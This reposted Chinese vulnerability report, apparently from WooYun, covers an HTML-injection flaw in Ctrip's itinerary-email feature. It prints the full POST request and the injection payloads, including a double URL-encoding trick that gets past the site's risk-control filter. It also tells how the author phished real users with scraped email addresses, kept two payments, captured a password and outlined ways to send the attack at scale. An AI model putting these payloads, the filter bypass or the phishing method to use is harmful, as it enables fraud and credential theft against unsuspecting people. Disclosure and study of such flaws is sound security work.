詳細說明：

這兩天在外面旅游又用起來攜程訂酒店，偶然看到這樣一個功能

可以給自己的郵箱發(fā)送一封自己的行程郵件，點開后默認的郵箱是自己賬戶綁定的郵箱，也可以自行修改為其他任意郵箱

來看一下郵件的內(nèi)容，

如果我們能控制頁面輸出變量的話，那么可以引發(fā)一場定向的釣魚***


郵箱都是支持html標記的，那么抓包來看一下,變量中所能控制的

code 區(qū)域POST /Customer-API-Online/Ajax/AjaxMailJourney.aspx HTTP/1.1
Host: my.ctrip.com
Proxy-Connection: keep-alive
Content-Length: 118
Cache-Control: max-age=0
Origin: http://my.ctrip.com
If-Modified-Since: Thu, 01 Jan 1970 00:00:00 GMT
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://my.ctrip.com/Customer-API-Online/MyJourney.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: *************************************************

UserName=頁面中輸出的用戶名，可控制&EmailTo=發(fā)往的郵箱目的地址&Consumer=&StartTime=&EndTime=&TargetCityName=&ItineraryType=-1&OrderStatusName=

code 區(qū)域UserName=頁面中輸出的用戶名，可控制&EmailTo=發(fā)往的郵箱目的地址

要能實現(xiàn)***，首先的就是測試是否對長度有限制，如果限制了長度，那么***將可能變得很雞肋甚至根本無法利用



設(shè)置

code 區(qū)域UserName=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

結(jié)果如圖：

并沒有長度限制，而且因為框架超出問題，原來的行程單也無法正常顯示，進一步提供了有利的條件



既然不限制長度，那么就來測試自定義html標簽的***了



測試1：

code 區(qū)域UserName=<img?src=https://www.baidu.com/img/bdlogo.png?/>

返回結(jié)果服務(wù)器500錯誤：

攜程的中間件風(fēng)險控制的規(guī)則應(yīng)該是匹配GET、POST（COOKIE沒有進行測試）中的高危行為，比如and 1=1、</>等，然后定義到錯誤頁面，如果同一IP連續(xù)多次訪問該錯誤頁面，那么就會在一段時間內(nèi)屏蔽該IP地址



測試2，urlencode 1次 ：

code 區(qū)域UserName=%3Cimg%20src=https://www.baidu.com/img/bdlogo.png%20/%3E

返回500，被防御規(guī)則丟棄



測試3，urlencode 2次：

code 區(qū)域UserName=%253Cimg%2520src=https://www.baidu.com/img/bdlogo.png%2520/%253E

返回200，如圖，成功繞過了風(fēng)險控制匹配

看一下郵件：

百度君插入了



之后就是對頁面元素分析，如何插入一個最真實逼真的釣魚環(huán)境



舉個例子，比如要把后面跟著的“先生/女士…………”移動到第一個框架外

code 區(qū)域UserName=Wooyun?html%253C/table%253E%253C/table%253E%253Ctable%253E%253Ctable%253E

可以看到，第一個淡藍色方框內(nèi)已經(jīng)排除了其他元素，剩下的可以自定義了

由于洞主對前端設(shè)計、html這一塊實在是一個渣渣



盡力也只能偽造了以下不忍直視的結(jié)果

將背景顏色設(shè)置為白色會好看點

數(shù)據(jù)庫里隨便選了100個攜程用戶的郵箱，發(fā)送了郵件進行釣魚測試

那么問題來了，用戶哪里來？

是否記得有一個這個漏洞：http://wooyun.org/bugs/wooyun-2014-077356

這個漏洞里面的問題，在報告之前很久就發(fā)現(xiàn)了，但是覺得不是安全問題很多站點都有該問題，以前只爬蟲收集過一部分用戶uid郵箱，一直躺在硬盤里，剛好拿出來用部分

下午就有了結(jié)果，很快，這么點錢我就不退了~~畢竟我不知道你們的支付寶。。。

只有2條支付過來的記錄，不過如果大規(guī)模進行***的話，還是很可怕的。



密碼釣魚也返回了1條

然后另選100條其他郵箱數(shù)據(jù)，非攜程用戶

在http://cli.im/生成二維碼附上，內(nèi)容為測試網(wǎng)站，做好IP統(tǒng)計

竟然有這么多人掃了。。。。看來攜程的知名度還是有的，福利誘惑一般人扛不住

2種方式進行規(guī)模化***：

1、直接導(dǎo)入郵箱變量進行fuzzing

2、可以一次性群發(fā)（注意最開始我提到的），發(fā)一次即可，一次50條郵箱，發(fā)太多怕被服務(wù)器拒絕。





==============================



Conclusion 總結(jié)



1、我寫的這么渣的釣魚頁面都能中招，看來大部分網(wǎng)民的安全意識還是很薄弱，如果換成前端大神@瘋狗 來精心偽造一頁面元素，說不定我都中招了。



2、安全不一定在于真正強的地方有多強。



3、風(fēng)控規(guī)則仍需完善，urlencode2次就繞過了。

漏洞證明：

修復(fù)方案：

Conclusion 總結(jié)

1、我寫的這么渣的釣魚頁面都能中招，看來大部分網(wǎng)民的安全意識還是很薄弱，如果換成前端大神@瘋狗 來精心偽造一頁面元素，說不定我都中招了。

2、安全不一定在于真正強的地方有多強。

3、風(fēng)控規(guī)則仍需完善，urlencode2次就繞過了。

原文連接：http://wooyun.org/bugs/wooyun-2015-0114708

轉(zhuǎn)載于:https://blog.51cto.com/qiudays/1719783

總結(jié)

以上是生活随笔為你收集整理的一种可大规模定向钓鱼携程旅游网千万用户的***过程重放(转载自wooyun)的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。